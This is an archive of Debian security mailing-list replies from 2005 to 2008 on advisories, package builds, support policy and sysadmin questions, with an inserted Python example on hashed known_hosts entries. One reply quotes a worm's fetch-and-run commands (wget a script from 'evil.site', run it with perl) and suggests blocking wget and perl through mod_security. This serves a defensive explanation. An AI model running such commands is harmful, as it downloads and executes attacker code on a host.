> look here, ps shows UID, not username. It's normal? of course
> uid=121(dansguardian) gid=114(dansguardian) gruppi=114(dansguardian)
>
> thanks
> LN
Re: [SECURITY] [DSA 1465-1] New apt-listchanges packages fix arbitrary code execution
On Thu Jan 17, 2008 at 16:35:47 +0100, Philipp Kern wrote:

Still that breaks because os is not imported. Please fix. Quickly.

Done.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
Re: [SECURITY] [DSA 1448-1] New eggdrop packages fix execution of arbitrary code
On Sat Jan 05, 2008 at 15:11:22 +, Steve Kemp wrote:

- Debian Security Advisory DSA-1448-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Steve Kemp
January 05, 2008 http://www.debian.org/security/faq
-

Apologies for sending this mail out twice.

Steve
Re: ping22: can not kill this process
On Fri Jan 04, 2008 at 06:04:50 -0200, Felipe Figueiredo wrote:

Does anybody have a clue as to why this default was chosen, and not the safest one?

Too many broken PHP applications? Anyway please see /usr/share/doc/php4-common/examples/ for different examples. (Or /usr/share/doc/php5-common/examples).

Steve
--
http://www.steve.org.uk/
Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution
On Fri Dec 07, 2007 at 09:46:21 -0500, Juan Gallego wrote:

| For the stable distribution (etch), this problem has been fixed in version
| 1.39+1.40-WIP-2006.11.14+dfsg-2etch1.
| For the unstable distribution (sid), this problem will be fixed shortly.

Is sarge affected by this vulnerability? Or has sarge been archived and I missed the announcement?

Sarge is affected, but I don't yet have a working patch for that. There should be an update shortly, but this is pretty low-risk and it seemed sensible to release now, rather than waiting.

Steve
Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution
On Fri Dec 07, 2007 at 18:41:35 +0100, Nico Golde wrote:

What about those, are they unimportant? They are still present in the etch code. I stumbled upon them while preparing a testing-security upload.

Unknown. I used the patch provided by Theodore Tso, which he is/was planning on using for Sid/Ubuntu. If there are missing bits then we'll need to reissue the update, but right now I believed the patch was as complete as it needed to be.

Sorry, this mail was originally only addressed to Steve but since I also got this mail through the debian-security list it ended up here now :)

Fair enough.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
Re: UNS: Re: [SECURITY] [DSA 1409-2] New samba packages fix several vulnerabilities
On Tue Nov 27, 2007 at 12:00:05 +1300, Ewen McNeill wrote:

In message [EMAIL PROTECTED], Steve Kemp writes:

Package: samba
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2007-4572, CVE-2007-5398
[...]
For the stable distribution (etch), these problems have been fixed in version 3.0.24-6etch7.

There doesn't appear to be an i386 package for Samba version 3.0.24-6etch7 on any of the security.debian.org servers. Only a 3.0.24-6etch6 package. AMD64 and most other architectures seem to have 3.0.24-6etch7 and not 3.0.24-6etch6 packages. According to the change log this means that one regression is missing in the i386 packages (6etch6):

That is correct. I've built a package now, and will be uploading shortly. In the meantime you can find it here:

http://people.debian.org/~skx/samba/

I'm not entirely sure whether this fixes all known regressions; there seem to be mixed reports, but it is the best we have and the most current elsewhere.

Steve
Re: Firewall with woody
On Wed Oct 17, 2007 at 11:05:58 -0300, Jorge Escudero wrote:

I have the Firewall with woody and I have never had any security problem. Is it risky to still be using this version?

Yes. There have been no security updates released for Woody in over a year, and that means there are liable to be security-relevant bugs present in your host(s).

Do I have to upgrade the version any time a new one is released?

You don't need to. We can't force you. But you should strongly consider the benefits of running a stable supported version of Debian which receives security fixes.

Steve
--
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/
Re: [SECURITY] [DSA 1379-1] New quagga packages fix denial of service
On Thu Oct 04, 2007 at 09:49:27 +0200, Etienne Favey wrote:

In what respect is the quagga problem related to the openssl problem, that it gets the same DSA ID number?

It was a mistake, the number was reused by accident.

Steve
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 18:01:10 +0300, Riku Valli wrote:

For the stable distribution (etch), this problem has been fixed in version 4:3.5.5a.dfsg.1-6etch1.

It seems that the kdebase and fetchmailconf dependencies are broken.

I don't see what the source of this is.

kdebase: Depends: kappfinder (= 4:3.5.5a.dfsg.1-6etch1) but 4:3.5.5a.dfsg.1-6 is installed.

kappfinder is a binary coming from the kdebase package.

Depends: kate (= 4:3.5.5a.dfsg.1-6etch1) but 4:3.5.5a.dfsg.1-6 is installed.

ditto.

Unless I'm being dense the kdebase package provides all the correct versions to satisfy itself: eg.

kappfinder_3.5.5a.dfsg.1-6etch1_amd64.deb
kate_3.5.5a.dfsg.1-6etch1_amd64.deb

(Same thing for fetchmail/fetchmailconf.)

Steve
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 16:48:34 +0100, Adam D. Barratt wrote:

I'm guessing the people reporting problems are i386 users.

Yeah, that seems to be the problem. Thanks for being explicit about it though :)

kdebase is arch:all and therefore installable on i386. kappfinder isn't and there aren't any i386 binary packages for it available.

Noah has kindly volunteered to build complete packages for i386, so I'd expect this situation to be resolved in the next few hours.

Steve
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 11:45:37 -0400, Noah Meyerhans wrote:

Check i386. The security archive does not seem to have a complete set of i386 binary packages...

Stupid buildds .. I'll find a spare i386 machine and build for that over the weekend all being well.

Steve
Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass
On Fri Sep 21, 2007 at 19:18:38 +0300, Riku Valli wrote:

fetchmailconf has a similar problem too.

That should be fixed now. I'm just going to send out the mail ...

Steve
Re: security.d.o packages for etch built on sarge
On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote:

On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote:

It looks like etch's security updates were built on sarge. python2.3 isn't available in etch making ekg's security update uninstallable.

I would be _very_ happy to hear _any_ comment on that. I'll probably ask debian-devel if I don't get any answer in the next few days.

Etch security updates *should* be built upon Etch. Sarge updates *should* be built upon Sarge. Anything else is liable to break and is a bug which should be fixed with an update.

I've checked the build-logs I've got access to (all except i386) and they seem fine. Is it just i386 you see this behavior upon? Do other people see this too, or is it a potentially broken system you're installing upon (I have to ask; some people still have mixed sources.lists files..)

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: an issue with recent security advisories
On Mon Jun 18, 2007 at 19:49:28 +1000, Tomasz Ciolek wrote:

been uploaded to the repositories and added to Releases and Packages files?

Yes.

What's the point of making a security advisory if the packages are NOT AVAILABLE in mirrors and repositories? Here is my sources.list... maybe I have some misconfiguration?

You're missing:

deb http://security.debian.org/ etch/updates main contrib non-free

We suggest people never mirror the security archive, to avoid problems, and this is the place where security updates will be uploaded to. The sources lists you have would only receive new updates for point releases of Etch.

Steve
Re: [SECURITY] [DSA 1266-1] New gnupg packages fix signature forgery
On Wed, Mar 14, 2007 at 11:43:40AM +0100, Frank Küster wrote:

Moritz Muehlenhoff [EMAIL PROTECTED] wrote:

For the upcoming stable distribution (etch) these problems have been fixed in version 1.4.6-2.

However, etch still has 1.4.6-1, and no freeze exception has been requested.

But it has been granted.

$ grep-excuses gnupg
gnupg (1.4.6-1 to 1.4.6-2)
Maintainer: James Troup
Too young, only 1 of 5 days old
Ignoring request to block package by freeze, due to unblock request by he
Not considered
$

We don't expect maintainers to request unblocks for RC bugfixes (in fact, I prefer they don't, it's just extra mail to reply to).

I'm not sure about the policy for security updates in etch, but it doesn't seem proper to announce the availability in a DSA if it's not yet true...

Hopefully, the fact that the security team made this statement means they were aware 1.4.6-2 was a candidate for inclusion in etch.

--
Steve Langasek
Debian Developer
[EMAIL PROTECTED]
http://www.debian.org/

"Give me a lever long enough and a Free OS to set it on, and I can move the world."
Re: Bug#401969: please build using hunspell
On Fri, Dec 08, 2006 at 10:32:50PM +0100, Mike Hommey wrote:

How does the security team feel about having to rebuild iceape, iceweasel, icedove (you forgot to file a bug on icedove), OOo and enchant if there happens to be a security bug in hunspell?

In general having multiple packages needing a rebuild for a single security fix is a problem, and not something we'd like to have to deal with.

(For a specific example think of the pdf/gs updates we had to make earlier in the year/last year. Lots of different programs with very similar code which didn't always get spotted at the same time.)

A more recent example would be the links + elinks updates. Links was updated first then we updated elinks afterwards when we learnt there was shared code ..

(Obvious in retrospect, but if there are a lot of packages which would require a rebuild keeping track of all of them can be difficult; especially if we don't know about it in advance.)

Steve
Re: Mass update deployment strategy
On Mon, Nov 27, 2006 at 08:37:42PM +0100, mario wrote:

I am responsible for 10 (ubuntu and debian) installations so far. I have installed apticron which informs me about updates frequently. Actually, it's that often that I sometimes need to invest 1h a day just doing updates.

Given the choice I'd much prefer identical distributions, even with a little pain. Since things differ between Ubuntu and Debian (and Redhat/SuSE/etc), having two or more security update schedules and two lots of testing is more painful.

Do you have a strategy or anything to automate this task a little more?

cfengine. I'm interested in puppet, but it wasn't (isn't yet?) stable at the time I started automation on a decent sized farm.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: [TGSysadmin] [SECURITY] [DSA 1155-1] New sendmail packages fix denial of service
On Thu, Aug 24, 2006 at 09:17:06AM -0400, Paul Nesbit wrote:

On Thu, Aug 24, 2006 at 08:23:59AM +0200, Martin Schulze [EMAIL PROTECTED] wrote:

[...] a MIME conversion routine in sendmail, a powerful, efficient, and scalable mail transport agent, could be tricked [...]

Funny, bias in errata reports.

All DSA notices have a description like that. These descriptions come from the package itself. eg:

[EMAIL PROTECTED]:~$ apt-cache show sendmail | grep Desc
Description: powerful, efficient, and scalable Mail Transport Agent

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: editing new known_hosts files
On Sat, Jul 22, 2006 at 11:48:00PM +0200, LeVA wrote:

I have reinstalled a server of mine, and now I need to remove its old pubkey from my $HOME/.ssh/known_hosts, but it is in the new format, so no hostnames which may indicate which pubkey belongs to which host. How can I decrypt the known_hosts file?

You can't decrypt them, but you can delete all entries for a given host with:

ssh-keygen -R host.name

See the manpage for ssh-keygen for details. (Search for hash to see the relevant options.)

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
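The answer above points at `ssh-keygen -R`; the added Python example below (not from the thread) shows why a hashed known_hosts file cannot be "decrypted" yet a host can still be matched: OpenSSH stores each host field as an HMAC-SHA1 of the name keyed with a per-line salt, so a candidate name is hashed with the same salt and compared. The sample file, salts and key strings are constructed for the example.

```python
"""Match and remove hashed known_hosts entries without "decrypting" them.

Added example, not from the original thread. With HashKnownHosts enabled,
OpenSSH writes each host field as  |1|<base64 salt>|<base64 HMAC-SHA1>
where the 20-byte salt is the HMAC key and the hostname (or "[host]:port")
is the message. A keyed hash cannot be reversed, but a candidate name can
be hashed with the same salt and compared, which is what `ssh-keygen -F`
and `ssh-keygen -R` do internally.
"""
import base64
import hashlib
import hmac
import os
from typing import List, Optional, Tuple

HASH_MAGIC = "|1|"  # OpenSSH's marker for a hashed hostname field


def hash_hostname(hostname: str, salt: Optional[bytes] = None) -> str:
    """Return the '|1|salt|hash' field OpenSSH would write for hostname."""
    if salt is None:
        salt = os.urandom(20)  # OpenSSH picks a fresh random salt per line
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return (HASH_MAGIC + base64.b64encode(salt).decode()
            + "|" + base64.b64encode(digest).decode())


def host_field_matches(host_field: str, hostname: str) -> bool:
    """True if a known_hosts host field refers to hostname.

    Handles hashed fields and the old comma-separated plain form; glob
    patterns in the plain form are not handled here.
    """
    if not host_field.startswith(HASH_MAGIC):
        return hostname in host_field.split(",")
    try:
        _, _, salt_b64, digest_b64 = host_field.split("|")
        salt = base64.b64decode(salt_b64)
        stored = base64.b64decode(digest_b64)
    except ValueError:
        return False  # malformed field: never match it
    computed = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(computed, stored)


def remove_host(known_hosts: str, hostname: str) -> Tuple[str, int]:
    """Drop every line for hostname, like `ssh-keygen -R hostname`.

    Returns the new file contents and the number of lines removed.
    Comments, blank lines and other hosts' lines are kept verbatim.
    """
    kept: List[str] = []
    removed = 0
    for line in known_hosts.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            kept.append(line)
            continue
        fields = stripped.split()
        # A line may start with a marker such as @cert-authority or
        # @revoked; the host field is then the second token.
        if fields[0].startswith("@") and len(fields) > 1:
            host_field = fields[1]
        else:
            host_field = fields[0]
        if host_field_matches(host_field, hostname):
            removed += 1
        else:
            kept.append(line)
    return ("\n".join(kept) + "\n") if kept else "", removed


# Constructed sample file: two hashed hosts and one plain-form entry.
# The salts and key strings are made up; real keys are long base64 blobs.
_SALT_OLD = bytes(range(20))
_SALT_OTHER = bytes(range(20, 40))
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed known_hosts for the example",
    hash_hostname("oldserver.example", _SALT_OLD)
    + " ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCconstructedOld",
    hash_hostname("other.example", _SALT_OTHER)
    + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIconstructedOther",
    "legacy.example,192.0.2.10 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCconstructedLegacy",
]) + "\n"


if __name__ == "__main__":
    new_text, n = remove_host(SAMPLE_KNOWN_HOSTS, "oldserver.example")
    print(f"removed {n} line(s); remaining file:\n{new_text}")
```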
Re: BADSIG verifying s.d.o Release file
On Fri, Jun 30, 2006 at 09:15:42AM +0200, martin f krafft wrote:

I've been seeing this a bunch in the past few weeks. Just making sure you know about it, and maybe someone knows what's going on:

W: GPG error: http://security.debian.org stable/updates Release: The following signatures were invalid: BADSIG 010908312D230C5F Debian Archive Automatic Signing Key (2006) [EMAIL PROTECTED]

This is a known issue, relating to some of the infrastructure changes. Hopefully it will be resolved shortly. Currently each of the release files are empty...

Steve
Re: BADSIG verifying s.d.o Release file
On Fri, Jun 30, 2006 at 10:33:55AM +0200, martin f krafft wrote:

also sprach Steve Kemp [EMAIL PROTECTED] [2006.06.30.1004 +0200]:

This is a known issue, relating to some of the infrastructure changes. Hopefully it will be resolved shortly.

Thanks Steve. Do you know why this was not publicised beforehand on debian-security-announce or debian-announce?

I think nobody thought of it to be honest, and people started to notice just around the time we did.

(The problem here comes from the new dak software being used to handle the archive, and this is just a problem that hadn't been spotted since we've only just started releasing advisories with it.)

Steve
Re: Command history log for audit trail
On Thu, Jun 15, 2006 at 01:08:37PM -0700, [EMAIL PROTECTED] wrote:

I need to set up an audit trail for all commands run on machines. I know that the auth.log records who logs in and when, and that each user's .bash_history has a history of their commands. But is there some other way to create a log for all commands run on a system?

Use the 'snoopy' package, as described here:

http://www.debian-administration.org/articles/88

Steve
Re: Debian Kernel security status?
On Thu, Apr 20, 2006 at 04:18:28PM +0200, Jan Luehr wrote:

Btw. Why do a lot of DSAs care about oldstable, while kernel-updates avoid woody?

Because building kernels is hard for Sarge and very hard for Woody. I seem to recall Joey asking for volunteers to help work on kernels a good few months back ...

DSAs for woody will probably cease soon as well. From memory we promised a year of support after the release of Sarge. Sarge was released early June, so that gives us the end of this month and then just May to continue with.

Of course if it isn't too hard, or there is a lot of demand, it may be possible to continue supporting it for a little longer.

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
Re: security issues with apache!
On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote:

If you have to leave some writable folders for Apache user, say, /tmp, moving /tmp to another partition/filesystem and mounting it with noexec option would prevent most harm /any/ PHP script can cause.

Not true. Several of the recent exploit worms do the equivalent of this:

cd /tmp
wget http://evil.site/perl/script.pl
perl /tmp/script.pl

Even if the /tmp partition is mounted noexec this will still work. (Although '/tmp/script.pl ' would fail.)

Noexec can help in some situations, but blocking 'wget', 'perl' etc in requests via mod_security is a much more useful thing to do.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: Another problem with gnupg
On Fri, Mar 10, 2006 at 09:42:00AM -0600, Michael Knoop wrote:

There is a new problem with the gnupg program and digital signatures.

http://lists.gnupg.org/pipermail/gnupg-announce/2006q1/000216.html

The original problem was fixed with DSA-978. This new, related, problem will be fixed shortly - new packages are already in the queue.

Steve
Re: [gna-private] [SECURITY] [DSA 987-1] New tar packages fix arbitrary code execution
On Wed, Mar 08, 2006 at 09:41:39AM +0100, Mathieu Roy wrote:

Package: tar
Vulnerability : buffer overflow
Problem-Type : local(remote)

What does local(remote) mean? Does it mean local... or remote?

Local. But remote in the sense that you may receive a .tar file from a remote source.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: first A record of security.debian.org extremely slow
On Thu, Mar 02, 2006 at 10:36:16PM +0100, Marc Haber wrote:

How would you implement the automatism to trigger the update on the incoming e-mail?

procmail, matching on new mails to the debian-security-announce mailing list ..

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: CVE-2006-0225, scponly shell command possible
On Wed, Feb 15, 2006 at 02:01:51PM +1100, Geoff Crompton wrote:

This bug has been closed for unstable (see bug 350964) with the 4.6 upload, but will it be fixed for sarge?

Please see DSA-969-1 released two days ago:

http://www.us.debian.org/security/2006/dsa-969

Sarge is fixed.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
Re: Removing email addresses from gpg-key?
On Tue, Jan 24, 2006 at 01:54:24PM +, Jonathan McDowell wrote:

You want to revoke the uids (revuid) rather than deleting them; there's no way you can delete them off other people's keyrings, or the keyservers, so you mark them as deleted instead by revoking them.

Thanks for that. Obvious once you said it too!

I've revoked the obsolete email addresses and uploaded again now.

Steve
Re: [SECURITY] [DSA 945-1] New antiword packages fix insecure temporary file creation
On Tue, Jan 17, 2006 at 07:59:45PM +0100, Florian Weimer wrote:

AFAICS, this rule is quite reasonable, so I assume that this antiword version is just a minor glitch. Correct?

Yes. My fault entirely. It actually took me a while to see what was wrong there - usually I just add 'sargeN' to the string, but for some reason I've updated the minor too.

Definitely something I'll be careful to avoid in the future.

Steve
Re: [SECURITY] [DSA 930-1] New smstools packages fix format string vulnerability
On Mon, Jan 09, 2006 at 02:32:18PM +0100, Thijs Kinkhorst wrote:

For the unstable distribution the package will be updated shortly.

It's great to hear that unstable will be fixed soon, but why wasn't there a grave bug filed against the package? If for some reason the maintainer misses this DSA, it is later on unknown that the version in unstable is vulnerable and still needs to be fixed...

A bug has been filed. If there is no action in a short space of time I'm happy to perform an NMU.

Testing will get the fix shortly via the package migration, so it is only sid users who are at risk; and we don't offer explicit security support there. (Though obviously it should be fixed ASAP.)

Steve
Re: hardening checkpoints
On Tuesday, 20 December 2005 16.18, Michelle Konzack wrote:

But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System with my preferred Desktop. In all Internet Cafes I get an IP via DHCP.

Wrong. I was in Milano (Italy) a few months ago, and I wanted to do exactly that. The person at the desk looked at me as if I were a Martian when I asked her if I could reboot the machine on my personal Debian live-cd. First, she didn't understand what all that was about, and second she couldn't control my connection time, so she simply refused. Moreover, in Italy you have to give an ID (they do a photocopy of it; she couldn't tell me how long they keep it..) to be able to use a computer in an Internet Café (terrorism you know...).

Sorry ;-)

Greetings Michelle

Have a nice day

--
steve
jabber : [EMAIL PROTECTED]
Re: hardening checkpoints
On Wednesday, 21 December 2005 12.40, Johannes Wiedersich wrote:

steve wrote:

On Tuesday, 20 December 2005 16.18, Michelle Konzack wrote:

But in ALL Internet Cafes I can use my own (selfmade) Debian Live-System with my preferred Desktop. In all Internet Cafes I get an IP via DHCP.

Wrong. I was in Milano (Italy) a few months ago, and I wanted to do exactly that. The person at the desk looked at me as if I were a Martian when I asked her if I could reboot the machine on my personal Debian live-cd. First, she didn't understand what all that was about, and second she couldn't control my connection time, so she simply refused. Moreover, in Italy you have to give an ID (they do a photocopy of it; she couldn't tell me how long they keep it..) to be able to use a computer in an Internet Café (terrorism you know...).

Sorry ;-)

Wrong: in Europe you shouldn't mix Italy with France.

right : you eat better in France than in Italy. No, being serious again, I read Michelle's post a bit too fast and I mixed things up. I don't know why, but I thought she was thinking of Europe in her post.

I don't know anything about Italian or French internet cafes, but I would be really surprised, if there would be anything similar in the way their administration works.

You're right, they don't, politics is now the difference, at least in Internet Cafés.

For Italy, no matter what you do or where you are, it is always a sure bet, that the person behind the counter (hotel, airport, etc. etc. internet cafe) won't allow anything 'unusual' without double and triple checking with his/her boss.

.. who is rarely there.

So Michelle's solution seems to be quite unrealistic. This usually means that you have to insist and wait.

I'm ok with waiting 5 minutes, but more is too much, especially when you're just looking for a theater's timetable and you're in a hurry (and the theater's phone is down. Own experience.)

(In Italy 'unusual' means 'slightly different from normal').

I'll leave you the responsibility of that definition ;-)

Short message: two countries in Europe (say Italy and France) are about as different from each other as any European country is from say the US.

I'm with you on that one. But living near France, I'm very much willing to go there and give it a try. Just for the sake of it. But, I don't know why, I feel that my live-cd won't be very much appreciated.. really too scary stuff, isn't it?

Johannes

--
steve
jabber : [EMAIL PROTECTED]
Re: Restricting ssh access to internet but not to internal network
I would likely restrict access to ssh from external, if at all possible. I realize that this isn't always possible but it should be possible to at least narrow down access to certain IP ranges.

For this particular problem I'm assuming there are two NICs in the computer, one with an IP in private space and the other with a public address?

One idea is to bind two SSH daemons, one for each NIC. Place no AllowGroups restriction on the internal SSH daemon. This means that all users can connect internally. On the SSH daemon bound externally place the AllowGroups restriction to restrict access to members of that group.

If there's only one NIC in the computer then you could still use two SSH daemons, just bind them to different ports. The internal port might be the standard tcp/22 whereas externally you would bind tcp/ or something. Then firewall off the access to port 22 from externally so that the internal-use daemon can't be accessed.

Hope that helps. I'm sure others will have ideas too.

Steve

On Thu, Nov 24, 2005 at 10:14:11PM -0800, Patrick wrote:

I have a server running sshd on Sarge. I want all users to be able to access the computer from within the internal network - but restrict access from the internet (to users in a particular group). Can this be achieved by combining the /etc/hosts.allow or /etc/hosts.deny files and the AllowGroup (or AllowUsers) options in the sshd configuration file? If so, how?
Re: What is a security bug?
On Wed, Nov 23, 2005 at 12:15:35PM +0100, Jasper Filon wrote:

Well, obviously it is not a _security_ bug, since it has nothing to do with security. However, it is a bug, maybe even a critical one.

I filed a couple of bugs on Mozilla relating to DOS attacks, crashing the browser on some badly formed input HTML. They were not treated as security bugs which surprised me at the time.

Steve
Re: PMASA-2005-6 when register_globals = on
On Tue, Nov 15, 2005 at 05:54:32PM +0100, Piotr Roszatycki wrote:

http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 reports that sarge's phpmyadmin package has a security flaw which occurs only if the register_globals = on setting is used. This feature is disabled in the Debian package by default so I doubt this is a serious problem. I'd like to ask if I should prepare the new package for sarge or not?

I think an upload would be justified.

Steve
Re: What's going on with advisory for phpmyadmin?
On Fri, Oct 28, 2005 at 10:16:03AM -0500, John Goerzen wrote:

On Fri, Oct 28, 2005 at 04:42:31PM +0200, Piotr Roszatycki wrote:

Why was my report ignored? I reported the problem 3 days ago and I had no reply.

This seems to be a very frequent problem going on for awhile now. Could someone from the security team comment on what the problem is?

The problem is that we receive a lot of reports, each of which may involve a significant amount of time to attend to. New entries are pushed onto the stack almost daily. Whilst some are simple and can be dealt with easily some are more complex and obviously we cannot disclose them publicly.

If it is useful I could begin sending out a form response, something like "Yes we received your report, yes we will fix it, please have patience." However a useful response such as "Yes we've got your package report and we'll update an advisory after we've done openssh, mozilla, the kernel." is not going to happen. Even estimating an advisory date is going to be non-trivial. (NOTE: Package names above are chosen at random ...)

Sometimes an issue will be responded to, fixed, and uploaded all in the same day. Sometimes it takes longer to:

* Confirm the problem.
* Produce a patch.
* Communicate with the package maintainer to discover when the Sid version will be tested.
* Communicate with other Linux distributions to make sure that the package can be updated by multiple distributions in a coordinated fashion.
* Communicate with the upstream developers to let them know, if they don't so far.
* Allocate and assign a unique ID for the issue.

The best thing that you can do when reporting problems is:

a) Be detailed.
b) Ideally have a patch, or a pointer to one.
c) Be patient.
d) Don't file reports which are already in the BTS.
e) Be patient.
f) Be patient.

All reports are read and responded to *in time*. Be patient. None of this is news.

Steve
Re: What's going on with advisory for phpmyadmin?
On Fri, Oct 28, 2005 at 11:01:29AM -0500, John Goerzen wrote:

Could someone from the security team comment on what the problem is?

The problem is that we receive a lot of reports, each of which may involve a significant amount of time to attend to.

Well, that's a symptom. Isn't the root problem not enough people on the team in this case?

That is almost certainly the case, however adding more members is still not going to result in immediate updates.

(Things like timezones, coordination, and other practicalities come into play with more members. Not to mention waiting for other vendors, upstream etc, is not something that will be helped by more members).

Steve
Re: [SECURITY] [DSA 862-1] New Ruby 1.6 packages fix safety bypass
On Tue, Oct 11, 2005 at 09:32:57AM +0200, Wolfgang Jeltsch wrote:

Am Dienstag, 11. Oktober 2005 09:01 schrieb Martin Schulze:

[...]
Package: ruby1.8

Ruby 1.6 or Ruby 1.8?

Both. See the table:

http://www.us.debian.org/security/2005/dsa-860
http://www.us.debian.org/security/2005/dsa-862

Steve
security.debian.org - Infrastructure updates
Hi,

Just a quick note to point people at this news announcement:
http://lists.debian.org/debian-news/debian-news-2005/msg00047.html

Steve
Re: ClamAV vulnerability
On Mon, Sep 26, 2005 at 05:36:27AM -0700, P PRABHU wrote:
> Any fix for the latest ClamAV buffer overflow in the file upx.c vulnerability? Currently the .deb based version is 0.84-2.sarge.2. Is this version subject to this vulnerability? If so, will any fix be released?

A DSA is pending, and should be available shortly.

Steve
-- 
# The Debian Security Audit Project. http://www.debian.org/security/audit
Re: security.debian.org timeouts
On Mon, Sep 19, 2005 at 09:18:29PM +0200, Noël Köthe wrote:
> Does anybody know what the problem is with klecker/security.d.o?
> http://lists.debian.org/debian-curiosa/2005/09/msg00018.html

There is an advisory pending ...

Steve
Re: Unusual incoming traffic detected from klecker.debian.org and sou rce.rfc822.org
On Wed, Sep 14, 2005 at 10:51:19AM +0200, Mathieu JANIN wrote:
> I was updating my system at that time, but klecker.debian.org is not in my sources (or perhaps under another name).

klecker.debian.org is security.debian.org, which might explain it?

Steve
Re: Bad press again...
On Mon, Aug 29, 2005 at 11:46:24AM -0500, Branden Robinson / Debian Project Leader wrote:
> As far as I know, the stable/oldstable security team was never (recently) down to Joey S. alone. Mike Stone and Steve Kemp have been active members for some time (Steve was, as I understand it, promoted from secretary to full member within the past couple of months).

Steve (me) still remains a secretary, rather than a full member.

Steve
Re: Bad press again...
Florian Weimer wrote:
> * Michael Stone:
> > Contact the security team. Describe the bug in such a way that the security team understands its severity and impact. It is not sufficient to say "just trust me and issue an advisory". From what I've seen so far this is not the obvious buffer overflow sort of bug, it's a configured behavior which deviates from some documented expectation. The question, then, is how that deviation occurs, what the documented expectation is, and (most importantly for stable) is there any chance that someone might be relying on the implemented behavior rather than the documented behavior.
>
> It seems that shorewall generates an ACL that ACCEPTs all traffic once a MAC rule matches. Further rules are not considered. The explanations in version 2.2.3 seem to indicate that this was the intended behavior, but its implications surprised upstream, and a corrected version was released.
>
> IMHO, Debian should publish at least a DSA that explains this discrepancy, especially if the package maintainer also thinks that it's necessary.

It seems to be fairly tricky to determine how much of a security risk a bug has to be before a fix will find its way into stable.

Another example is fwbuilder which *silently* fails to overwrite its generated script at compile time if the user doesn't have write permissions on the existing script. I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you aren't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable? Who decides?
Re: Bad press again...
Florian Weimer wrote:
> * Steve Wray:
> > Another example is fwbuilder which *silently* fails to overwrite its generated script at compile time if the user doesn't have write permissions on the existing script.
>
> Most bugs in security tools are security bugs. We have to draw a line somewhere, otherwise stable becomes meaningless.

Actually, having followed the mozilla/firefox discussion and various other threads on this list, I am inclined to believe that the concept of a stable distribution in the modern internet/open source environment is already meaningless.

> > I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you aren't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable?
>
> The underlying problem seems to be that fwbuilder does not provide means to test a configuration after it has been applied to the system. Such tests would catch a more general class of problems, and not just some isolated file system problem.

Not quite. When the fwbuilder application tries to write to the file, it fails. This exception doesn't appear to be handled by anything at all and hence the silent failure to write to the file. The issue of actually testing firewall configurations is a whole 'nother problem.
Re: Bad press again...
Florian Weimer wrote:
> * Steve Wray:
> > I view this as a security problem because what if you *think* you've made changes to your firewall and are now protected only... you aren't and the firewall hasn't been updated? Is that enough of a security problem for the fix to get into stable?
>
> [snip]
>
> > When the fwbuilder application tries to write to the file, it fails. This exception doesn't appear to be handled by anything at all and hence the silent failure to write to the file. The issue of actually testing firewall configurations is a whole 'nother problem.
>
> But you agree that automated tests of the configuration, after it has been written and applied, would detect such a problem (if there are proper test cases, of course)?

Regression testing of firewall rules would have to be the 'holy grail' of the work we do here, where there are approximately one bazillion firewalls to manage, with regular changes to production systems. It'd need some serious AI programming though and probably some sort of netfilter simulator. It shouldn't be too hard to implement in an appropriate language. Prolog or one of the 'constraint programming' languages perhaps. But this, while fascinating, is getting way off topic :)

> I'm NOT saying that the bug shouldn't be fixed. What I want to say is that the mere occurrence of such a bug is a symptom of a larger problem in the software. If we start labeling such symptoms as security bugs, we can probably issue five DSAs a week for ordinary bugs in software which is somewhat security-related. (GnuPG crashes, and users might skip verification of a signature on an important document, putting them at risk -- is this really a security bug?)

This is very true and pretty well what I'm getting at. I don't believe that there can be any hard and fast rules as to what counts as enough of a bug to count as a security bug. It's down to people making decisions.

In the end, I imagine that a lot of production sites out there are *having* to move to debian 'backports'. They certainly were for woody... Now is *that* good for anyone concerned? I don't believe that it is; the backport packages probably don't get anywhere near the QA that packages that actually go into 'stable' get.

Sometimes I get the feeling that the end user must choose between reliability and security which is, in truth, a total oxymoron. I just get the feeling that things today move too fast to hold any distribution to a very strict interpretation of 'stable'.
Re: On Mozilla-* updates
On Sun, Jul 31, 2005 at 06:18:18PM +0100, antgel wrote:
